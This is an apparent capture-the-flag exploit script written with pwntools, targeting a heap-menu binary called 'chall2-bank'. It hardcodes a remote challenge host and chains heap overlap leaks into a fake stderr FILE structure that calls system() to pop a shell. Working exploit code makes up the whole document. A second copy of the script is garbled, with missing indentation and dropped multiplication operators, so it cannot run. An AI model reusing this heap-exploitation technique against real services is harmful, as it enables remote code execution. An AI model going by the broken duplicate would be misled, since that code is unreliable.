hama7230/exploit.py

## exploit.py
#!/usr/bin/env python
from pwn import *

context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window

# libc = ELF('')
elf = ELF('./chall2-bank')
context(os='linux', arch=elf.arch)
#context(log_level='debug')  # output verbose log

RHOST = "185.168.131.144"
RPORT = 6000
LHOST = "127.0.0.1"
LPORT = 6000

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

def dbg(ss):
    log.info("%s: 0x%x" % (ss, eval(ss)))

conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in 'rl':
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    gdbscript = """
    set environment LD_PRELOAD=./libc-2.24.so
    continue
    """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
    conn = gdb.debug(['./chall2-bank'], gdbscript=gdbscript)
else:
    #conn = process(['./chall2-bank'])
    conn = process(['./chall2-bank'], env={'LD_PRELOAD': './libc-2.24.so'})
    if opt == 'a': gdb.attach(conn)

def create(title, stat):
    conn.sendlineafter('5. View your bank status', '1')
    conn.sendafter(' bank account:', title)
    conn.sendlineafter('bank statement:', str(len(stat)+1))
    conn.sendline(stat)
    conn.recvuntil('index')

def title(idx, title):
    conn.sendlineafter('5. View your bank status', '2')
    conn.sendlineafter(' bank account:', str(idx))
    conn.send(title)

def stat(idx, stat):
    conn.sendlineafter('5. View your bank status', '3')
    conn.sendlineafter(' bank account:', str(idx))
    conn.sendline(stat)

def delete(idx):
    conn.sendlineafter('5. View your bank status', '4')
    conn.sendlineafter(' bank account:', str(idx))

def show(idx):
    conn.sendlineafter('5. View your bank status', '5')
    conn.sendlineafter(' bank account:', str(idx))

# exploit
log.info('Pwning')

create('x'*0x8, 'a'*0x1f)
create('x'*0x8, 'a'*0x1f)
delete(0)
create('y'*0x8, 'a'*0x57)
create('y'*0x8, 'a'*0x57)
delete(1)
create('x'*0x8, 'a'*0x2f)

create('x'*0x10+'\xe1', 'a'*0x1f)
delete(0)
create('y'*0x8, 'a'*0x57)
show(2)
conn.recvuntil('Statement: ')
#libc_base = u64(conn.recv(6)+'\x00\x00') - 0x3c1b58
libc_base = u64(conn.recv(6)+'\x00\x00') - 0x397b58
dbg('libc_base')

create('x'*0x8, 'a'*0x1f)
show(2)
conn.recvuntil('Statement: ')
bin_base = u64(conn.recv(6)+'\x00\x00') - 0x202010
dbg('bin_base')

create('x'*0x8, 'a'*0x1f)
create('x'*0x8, 'a'*0x1f)
delete(5)
create('0'*0x8, 'a'*0x57)
create('1'*0x8, 'a'*0x57)
delete(6)
create('x'*0x8, 'a'*0x2f)

create('x'*0x10+'\xe1', 'a'*0x1f)
delete(5)
create('2'*0x8, 'a'*0x57)
delete(6)
create('3'*0x8, 'a'*0x57)

delete(5)
delete(6)
show(7)
conn.recvuntil('Statement: ')
heap_base = u64(conn.recv(6)+'\x00\x00') - 0x2d0
dbg('heap_base')
create('3'*0x8, 'a'*0x57)
create('3'*0x8, 'a'*0x57)

delete(5)
delete(6)
delete(7)
create('3'*0x8, p64(libc_base+0x3984dd).ljust(0x57, 'x'))
create('3'*0x8, 'a'*0x57)
create('3'*0x8, 'a'*0x50+p64(0xdeadbeef)[:-1])

payload = '\x00'*3 + p64(0)*2 + p64(heap_base+ 0x4f0)
print(hex(len(payload)))
conn.sendline('1')
conn.sendafter(' bank account:', 'xxxxxxx')
conn.sendlineafter('bank statement:', str(0x5f))
time.sleep(1)
conn.sendline(payload)

create('a', 'd'*0x1f)

fake_stderr = ''
fake_stderr += p64(0)  # 0
fake_stderr += p64(0)*3
fake_stderr += p64(0) + p64(0x7fffffffffffffff)
fake_stderr += p64(0)*2
fake_stderr += p64((libc_base + 0x1619be-100)/2) + p64(0) * 0xb
fake_stderr += p64(libc_base + 0x399770)
fake_stderr += p64(0) *3
fake_stderr += p64(0)
fake_stderr += p64(0) * 2
fake_stderr += p64(libc_base +0x394440+0xc0) # _IO_str_jumps
fake_stderr += p64(libc_base + 0x3f480) # system

conn.sendline('1')
conn.sendafter(' bank account:', 'xxxxxxx')
conn.sendlineafter('bank statement:', str(0x67))
time.sleep(0.1)
conn.sendline(fake_stderr[0:0x60])
delete(10)
conn.sendline('1')
conn.sendafter(' bank account:', 'xxxxxxx')
conn.sendlineafter('bank statement:', str(0x37))
time.sleep(0.1)
conn.sendline(fake_stderr[0x80:0x80+0x30])
conn.sendline('1')
conn.sendafter(' bank account:', 'xxxxxxx')
conn.sendlineafter('bank statement:', str(0x67))
time.sleep(0.1)
conn.sendline(fake_stderr[0xd0:])

# delete(9)
conn.interactive()
	#!/usr/bin/env python
	from pwn import *

	context(terminal=['tmux', 'splitw', '-h']) # horizontal split window

	# libc = ELF('')
	elf = ELF('./chall2-bank')
	context(os='linux', arch=elf.arch)
	#context(log_level='debug') # output verbose log

	RHOST = "185.168.131.144"
	RPORT = 6000
	LHOST = "127.0.0.1"
	LPORT = 6000

	def section_addr(name, elf=elf):
	return elf.get_section_by_name(name).header['sh_addr']

	def dbg(ss):
	log.info("%s: 0x%x" % (ss, eval(ss)))

	conn = None
	opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
	if opt in 'rl':
	conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
	elif opt == 'd':
	gdbscript = """
	set environment LD_PRELOAD=./libc-2.24.so
	continue
	""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
	conn = gdb.debug(['./chall2-bank'], gdbscript=gdbscript)
	else:
	#conn = process(['./chall2-bank'])
	conn = process(['./chall2-bank'], env={'LD_PRELOAD': './libc-2.24.so'})
	if opt == 'a': gdb.attach(conn)

	def create(title, stat):
	conn.sendlineafter('5. View your bank status', '1')
	conn.sendafter(' bank account:', title)
	conn.sendlineafter('bank statement:', str(len(stat)+1))
	conn.sendline(stat)
	conn.recvuntil('index')

	def title(idx, title):
	conn.sendlineafter('5. View your bank status', '2')
	conn.sendlineafter(' bank account:', str(idx))
	conn.send(title)

	def stat(idx, stat):
	conn.sendlineafter('5. View your bank status', '3')
	conn.sendlineafter(' bank account:', str(idx))
	conn.sendline(stat)

	def delete(idx):
	conn.sendlineafter('5. View your bank status', '4')
	conn.sendlineafter(' bank account:', str(idx))

	def show(idx):
	conn.sendlineafter('5. View your bank status', '5')
	conn.sendlineafter(' bank account:', str(idx))

	# exploit
	log.info('Pwning')

	create('x'0x8, 'a'0x1f)
	create('x'0x8, 'a'0x1f)
	delete(0)
	create('y'0x8, 'a'0x57)
	create('y'0x8, 'a'0x57)
	delete(1)
	create('x'0x8, 'a'0x2f)

	create('x'0x10+'\xe1', 'a'0x1f)
	delete(0)
	create('y'0x8, 'a'0x57)
	show(2)
	conn.recvuntil('Statement: ')
	#libc_base = u64(conn.recv(6)+'\x00\x00') - 0x3c1b58
	libc_base = u64(conn.recv(6)+'\x00\x00') - 0x397b58
	dbg('libc_base')

	create('x'0x8, 'a'0x1f)
	show(2)
	conn.recvuntil('Statement: ')
	bin_base = u64(conn.recv(6)+'\x00\x00') - 0x202010
	dbg('bin_base')

	create('x'0x8, 'a'0x1f)
	create('x'0x8, 'a'0x1f)
	delete(5)
	create('0'0x8, 'a'0x57)
	create('1'0x8, 'a'0x57)
	delete(6)
	create('x'0x8, 'a'0x2f)

	create('x'0x10+'\xe1', 'a'0x1f)
	delete(5)
	create('2'0x8, 'a'0x57)
	delete(6)
	create('3'0x8, 'a'0x57)

	delete(5)
	delete(6)
	show(7)
	conn.recvuntil('Statement: ')
	heap_base = u64(conn.recv(6)+'\x00\x00') - 0x2d0
	dbg('heap_base')
	create('3'0x8, 'a'0x57)
	create('3'0x8, 'a'0x57)

	delete(5)
	delete(6)
	delete(7)
	create('3'*0x8, p64(libc_base+0x3984dd).ljust(0x57, 'x'))
	create('3'0x8, 'a'0x57)
	create('3'0x8, 'a'0x50+p64(0xdeadbeef)[:-1])

	payload = '\x00'3 + p64(0)2 + p64(heap_base+ 0x4f0)
	print(hex(len(payload)))
	conn.sendline('1')
	conn.sendafter(' bank account:', 'xxxxxxx')
	conn.sendlineafter('bank statement:', str(0x5f))
	time.sleep(1)
	conn.sendline(payload)

	create('a', 'd'*0x1f)

	fake_stderr = ''
	fake_stderr += p64(0) # 0
	fake_stderr += p64(0)*3
	fake_stderr += p64(0) + p64(0x7fffffffffffffff)
	fake_stderr += p64(0)*2
	fake_stderr += p64((libc_base + 0x1619be-100)/2) + p64(0) * 0xb
	fake_stderr += p64(libc_base + 0x399770)
	fake_stderr += p64(0) *3
	fake_stderr += p64(0)
	fake_stderr += p64(0) * 2
	fake_stderr += p64(libc_base +0x394440+0xc0) # _IO_str_jumps
	fake_stderr += p64(libc_base + 0x3f480) # system

	conn.sendline('1')
	conn.sendafter(' bank account:', 'xxxxxxx')
	conn.sendlineafter('bank statement:', str(0x67))
	time.sleep(0.1)
	conn.sendline(fake_stderr[0:0x60])
	delete(10)
	conn.sendline('1')
	conn.sendafter(' bank account:', 'xxxxxxx')
	conn.sendlineafter('bank statement:', str(0x37))
	time.sleep(0.1)
	conn.sendline(fake_stderr[0x80:0x80+0x30])
	conn.sendline('1')
	conn.sendafter(' bank account:', 'xxxxxxx')
	conn.sendlineafter('bank statement:', str(0x67))
	time.sleep(0.1)
	conn.sendline(fake_stderr[0xd0:])

	# delete(9)
	conn.interactive()